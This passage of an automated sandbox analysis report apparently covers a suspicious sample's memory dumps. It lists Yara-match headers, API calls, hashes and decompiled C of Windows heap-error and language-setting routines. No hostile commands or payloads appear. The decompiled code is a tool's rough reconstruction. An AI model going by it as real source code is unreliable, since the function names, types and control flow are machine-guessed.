                                                                  • RtlAllocateHeap.NTDLL(03123506,?,03123C7F,03123C7F,?,03123506,?,?,?,?,?,00000000,00000000,?), ref: 031284AD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                  • Instruction ID: 28680727258a99a6566b9a9b138b8b5ce6ee87dff074ff57cdd4ac6d2cc2cba2
                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                  • Instruction Fuzzy Hash: BBE012B6200218ABDB14EF99CC40EA777ACAF88650F118558BA085B241CA30F9148AF0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0311D3FD, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,03117C63,?), ref: 0311D42B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 227ea5626b613e73d36c05347d9935b9172872ced43f820f2602f720667d8187
                                                                  • Instruction ID: e20dcd5968acda92ffe4bba8238cc20650ba98e9be0665d8d549cfc5db9d2278
                                                                  • Opcode Fuzzy Hash: 227ea5626b613e73d36c05347d9935b9172872ced43f820f2602f720667d8187
                                                                  • Instruction Fuzzy Hash: 84D0A7757903003FF610EAA4EC02F7667C6AB58651F0D4474F54CDB3C3DB15D0114120
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0311D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,03117C63,?), ref: 0311D42B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                  • Instruction ID: e2e988e001a6765e76f91e834d325d3674d5a6a1526436a69d6319a9f338cb08
                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                  • Instruction Fuzzy Hash: D4D0A7757903043BE610FAA8AC03F6672CD9B48A00F494074F948DB3C3DA54F4104161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0497967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 54b48644becdcace7c97a5573d3c660510214bb9b0befc4b4908f77bc18ec3fb
                                                                  • Instruction ID: 45cbbd8cdc4154985eb99d197bfe7efa41c23dea5035c6419c830a91eb200ba4
                                                                  • Opcode Fuzzy Hash: 54b48644becdcace7c97a5573d3c660510214bb9b0befc4b4908f77bc18ec3fb
                                                                  • Instruction Fuzzy Hash: 9FB09BB19015C5C5F711E7644608F177944B7E0745F16C175D1020645A4778D091F6B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 049EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • The resource is owned shared by %d threads, xrefs: 049EB37E
                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 049EB352
                                                                  • The instruction at %p referenced memory at %p., xrefs: 049EB432
                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 049EB47D
                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 049EB38F
                                                                  • read from, xrefs: 049EB4AD, 049EB4B2
                                                                  • an invalid address, %p, xrefs: 049EB4CF
                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 049EB3D6
                                                                  • The critical section is owned by thread %p., xrefs: 049EB3B9
                                                                  • The instruction at %p tried to %s , xrefs: 049EB4B6
                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 049EB48F
                                                                  • This failed because of error %Ix., xrefs: 049EB446
                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 049EB39B
                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 049EB323
                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 049EB484
                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 049EB2F3
                                                                  • *** enter .exr %p for the exception record, xrefs: 049EB4F1
                                                                  • *** enter .cxr %p for the context, xrefs: 049EB50D
                                                                  • *** then kb to get the faulting stack, xrefs: 049EB51C
                                                                  • *** Inpage error in %ws:%s, xrefs: 049EB418
                                                                  • Go determine why that thread has not released the critical section., xrefs: 049EB3C5
                                                                  • a NULL pointer, xrefs: 049EB4E0
                                                                  • write to, xrefs: 049EB4A6
                                                                  • The resource is owned exclusively by thread %p, xrefs: 049EB374
                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 049EB53F
                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 049EB2DC
                                                                  • <unknown>, xrefs: 049EB27E, 049EB2D1, 049EB350, 049EB399, 049EB417, 049EB48E
                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 049EB314
                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 049EB476
                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 049EB305
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                  • API String ID: 0-108210295
                                                                  • Opcode ID: f01c79cf80ed60ad2bff37b1a9af0a7a54e2ea098bdf456581bd6a55e38f81ae
                                                                  • Instruction ID: 83284082941bf6f03ac57df578e63629abfc9d1aaa3c641ed7a3f0dc710c1028
                                                                  • Opcode Fuzzy Hash: f01c79cf80ed60ad2bff37b1a9af0a7a54e2ea098bdf456581bd6a55e38f81ae
                                                                  • Instruction Fuzzy Hash: 46811835A81220FFEB22AE06CD49D7B3B2AAFC6765F414178F5042B116E371B441DBB6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E049F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x49148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0493B150();
				} else {
					E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4a2589c);
				E0493B150("Heap error detected at %p (heap handle %p)\n",  *0x4a258a0);
				_t27 =  *0x4a25898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M049F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0493B150();
				} else {
					E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0493B150("Error code: %d - %s\n",  *0x4a25898);
				_t113 =  *0x4a258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0493B150();
					} else {
						E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0493B150("Parameter1: %p\n",  *0x4a258a4);
				}
				_t115 =  *0x4a258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0493B150();
					} else {
						E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0493B150("Parameter2: %p\n",  *0x4a258a8);
				}
				_t117 =  *0x4a258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0493B150();
					} else {
						E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0493B150("Parameter3: %p\n",  *0x4a258ac);
				}
				_t119 =  *0x4a258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0493B150();
					} else {
						E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4a258b4);
					E0493B150("Last known valid blocks: before - %p, after - %p\n",  *0x4a258b0);
				} else {
					_t120 =  *0x4a258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0493B150();
				} else {
					E0493B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0493B150("Stack trace available at %p\n", 0x4a258c0);
			}











                                                                  0x049f1c10
                                                                  0x049f1c16
                                                                  0x049f1c1e
                                                                  0x049f1c3d
                                                                  0x049f1c3e
                                                                  0x049f1c20
                                                                  0x049f1c35
                                                                  0x049f1c3a
                                                                  0x049f1c44
                                                                  0x049f1c55
                                                                  0x049f1c5a
                                                                  0x049f1c65
                                                                  0x049f1c67
                                                                  0x00000000
                                                                  0x049f1c6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049f1c67
                                                                  0x049f1cdc
                                                                  0x049f1ce5
                                                                  0x049f1d04
                                                                  0x049f1d05
                                                                  0x049f1ce7
                                                                  0x049f1cfc
                                                                  0x049f1d01
                                                                  0x049f1d0b
                                                                  0x049f1d17
                                                                  0x049f1d1f
                                                                  0x049f1d25
                                                                  0x049f1d30
                                                                  0x049f1d4f
                                                                  0x049f1d50
                                                                  0x049f1d32
                                                                  0x049f1d47
                                                                  0x049f1d4c
                                                                  0x049f1d61
                                                                  0x049f1d67
                                                                  0x049f1d68
                                                                  0x049f1d6e
                                                                  0x049f1d79
                                                                  0x049f1d98
                                                                  0x049f1d99
                                                                  0x049f1d7b
                                                                  0x049f1d90
                                                                  0x049f1d95
                                                                  0x049f1daa
                                                                  0x049f1db0
                                                                  0x049f1db1
                                                                  0x049f1db7
                                                                  0x049f1dc2
                                                                  0x049f1de1
                                                                  0x049f1de2
                                                                  0x049f1dc4
                                                                  0x049f1dd9
                                                                  0x049f1dde
                                                                  0x049f1df3
                                                                  0x049f1df9
                                                                  0x049f1dfa
                                                                  0x049f1e00
                                                                  0x049f1e0a
                                                                  0x049f1e13
                                                                  0x049f1e32
                                                                  0x049f1e33
                                                                  0x049f1e15
                                                                  0x049f1e2a
                                                                  0x049f1e2f
                                                                  0x049f1e39
                                                                  0x049f1e4a
                                                                  0x049f1e02
                                                                  0x049f1e02
                                                                  0x049f1e08
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049f1e08
                                                                  0x049f1e5b
                                                                  0x049f1e7a
                                                                  0x049f1e7b
                                                                  0x049f1e5d
                                                                  0x049f1e72
                                                                  0x049f1e77
                                                                  0x049f1e95

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                  • API String ID: 0-2897834094
                                                                  • Opcode ID: 852208c21fee473fa3c678887b0e989f408b5550e5de4d213ac91e448a8262f8
                                                                  • Instruction ID: 0c7629fe9bd98502b4abb72f13b9146891157c04f5f66d0f71e6f01056058a9a
                                                                  • Opcode Fuzzy Hash: 852208c21fee473fa3c678887b0e989f408b5550e5de4d213ac91e448a8262f8
                                                                  • Instruction Fuzzy Hash: 7D61F432A10254DFEA119B88DAC6E3473E5FB44B31B09847BF6095B315E674FC42AF89
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04943D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 96%
                                                                  			E04943D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04941B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04941B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04941B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04941B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04941B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04954620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0497F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04981370(_t276, 0x4914e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0497BB40(0,  &_v68, _t170);
									if(L049443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0497BB40(_t257,  &_v68, _t243);
								if(L049443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04981370(_t278, 0x4914e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04954620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0497F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04981370(_v16, 0x4914e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0497BB40(_t262,  &_v68, _t244);
								if(L049443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04981370(_t282, 0x4914e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0497BB40(_t262,  &_v68, _t201);
							if(L049443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04954620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0497F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04981370(_t280, 0x4914e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0497BB40(_t267,  &_v68, _t245);
							if(L049443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04981370(_t284, 0x4914e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0497BB40(_t267,  &_v68, _t224);
						if(L049443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                  0x04943d3c
                                                                  0x04943d42
                                                                  0x04943d44
                                                                  0x04943d46
                                                                  0x04943d49
                                                                  0x04943d4c
                                                                  0x04943d4f
                                                                  0x04943d52
                                                                  0x04943d55
                                                                  0x04943d58
                                                                  0x04943d5b
                                                                  0x04943d5f
                                                                  0x04943d61
                                                                  0x04943d66
                                                                  0x04998213
                                                                  0x04998218
                                                                  0x04944085
                                                                  0x04944088
                                                                  0x0494408e
                                                                  0x04944094
                                                                  0x0494409a
                                                                  0x049440a0
                                                                  0x049440a6
                                                                  0x049440a9
                                                                  0x049440af
                                                                  0x049440b6
                                                                  0x049440bd
                                                                  0x049440bd
                                                                  0x04943d83
                                                                  0x0499821f
                                                                  0x04998229
                                                                  0x04998238
                                                                  0x04998238
                                                                  0x0499823d
                                                                  0x0499823d
                                                                  0x04943da0
                                                                  0x04943daf
                                                                  0x04943db5
                                                                  0x04943dba
                                                                  0x04943dba
                                                                  0x04943dd4
                                                                  0x04943e94
                                                                  0x04943eab
                                                                  0x04943f6d
                                                                  0x04943f84
                                                                  0x0494406b
                                                                  0x0494406b
                                                                  0x0494406e
                                                                  0x0494406e
                                                                  0x04944070
                                                                  0x04944074
                                                                  0x04998351
                                                                  0x04998351
                                                                  0x0494407a
                                                                  0x0494407f
                                                                  0x0499835d
                                                                  0x04998370
                                                                  0x04998377
                                                                  0x04998379
                                                                  0x0499837c
                                                                  0x0499837c
                                                                  0x0499835d
                                                                  0x00000000
                                                                  0x0494407f
                                                                  0x04943f8a
                                                                  0x04943f8d
                                                                  0x04943f90
                                                                  0x04943f95
                                                                  0x0499830d
                                                                  0x0499830f
                                                                  0x04943f9b
                                                                  0x04943fac
                                                                  0x04943fae
                                                                  0x04943fb1
                                                                  0x04943fb1
                                                                  0x04943fb6
                                                                  0x04998317
                                                                  0x0499831a
                                                                  0x00000000
                                                                  0x04943fbc
                                                                  0x04943fc1
                                                                  0x04943fc9
                                                                  0x04943fd7
                                                                  0x04943fda
                                                                  0x04943fdd
                                                                  0x04944021
                                                                  0x04944021
                                                                  0x04944029
                                                                  0x04944030
                                                                  0x04944044
                                                                  0x04944046
                                                                  0x04944046
                                                                  0x04944044
                                                                  0x04944049
                                                                  0x04998327
                                                                  0x04998334
                                                                  0x04998339
                                                                  0x0499833c
                                                                  0x0494404f
                                                                  0x0494404f
                                                                  0x0494404f
                                                                  0x04944051
                                                                  0x04944056
                                                                  0x04944063
                                                                  0x04944063
                                                                  0x04944068
                                                                  0x00000000
                                                                  0x04944068
                                                                  0x04943fdf
                                                                  0x04943fe2
                                                                  0x04943fe4
                                                                  0x04943fe7
                                                                  0x04943fef
                                                                  0x04944003
                                                                  0x04944005
                                                                  0x04944005
                                                                  0x0494400c
                                                                  0x04944013
                                                                  0x04944016
                                                                  0x04944017
                                                                  0x0494401b
                                                                  0x0494401e
                                                                  0x00000000
                                                                  0x0494401e
                                                                  0x04943fb6
                                                                  0x04943eb1
                                                                  0x04943eb4
                                                                  0x04943eb7
                                                                  0x04943ebc
                                                                  0x049982a9
                                                                  0x049982ab
                                                                  0x04943ec2
                                                                  0x04943ed3
                                                                  0x04943ed5
                                                                  0x04943ed8
                                                                  0x04943ed8
                                                                  0x04943edd
                                                                  0x049982b3
                                                                  0x049982b6
                                                                  0x00000000
                                                                  0x04943ee3
                                                                  0x04943ee8
                                                                  0x04943eed
                                                                  0x04943ef0
                                                                  0x04943ef3
                                                                  0x04943f02
                                                                  0x04943f05
                                                                  0x04943f08
                                                                  0x049982c0
                                                                  0x049982c3
                                                                  0x049982c5
                                                                  0x049982c8
                                                                  0x049982d0
                                                                  0x049982e4
                                                                  0x049982e6
                                                                  0x049982e6
                                                                  0x049982ed
                                                                  0x049982f4
                                                                  0x049982f7
                                                                  0x049982f8
                                                                  0x049982fc
                                                                  0x049982ff
                                                                  0x049982ff
                                                                  0x04943f0e
                                                                  0x04943f11
                                                                  0x04943f16
                                                                  0x04943f1d
                                                                  0x04943f31
                                                                  0x04998307
                                                                  0x04998307
                                                                  0x04943f31
                                                                  0x04943f39
                                                                  0x04943f48
                                                                  0x04943f4d
                                                                  0x04943f50
                                                                  0x04943f50
                                                                  0x04943f53
                                                                  0x04943f58
                                                                  0x04943f65
                                                                  0x04943f65
                                                                  0x04943f6a
                                                                  0x00000000
                                                                  0x04943f6a
                                                                  0x04943edd
                                                                  0x04943dda
                                                                  0x04943ddd
                                                                  0x04943de0
                                                                  0x04943de5
                                                                  0x04998245
                                                                  0x04943deb
                                                                  0x04943df7
                                                                  0x04943dfc
                                                                  0x04943dfe
                                                                  0x04943e01
                                                                  0x04943e01
                                                                  0x04943e06
                                                                  0x0499824d
                                                                  0x0499824f
                                                                  0x04998254
                                                                  0x00000000
                                                                  0x04943e0c
                                                                  0x04943e11
                                                                  0x04943e16
                                                                  0x04943e19
                                                                  0x04943e29
                                                                  0x04943e2c
                                                                  0x04943e2f
                                                                  0x0499825c
                                                                  0x0499825f
                                                                  0x04998261
                                                                  0x04998264
                                                                  0x0499826c
                                                                  0x04998280
                                                                  0x04998282
                                                                  0x04998282
                                                                  0x04998289
                                                                  0x04998290
                                                                  0x04998293
                                                                  0x04998294
                                                                  0x04998298
                                                                  0x0499829b
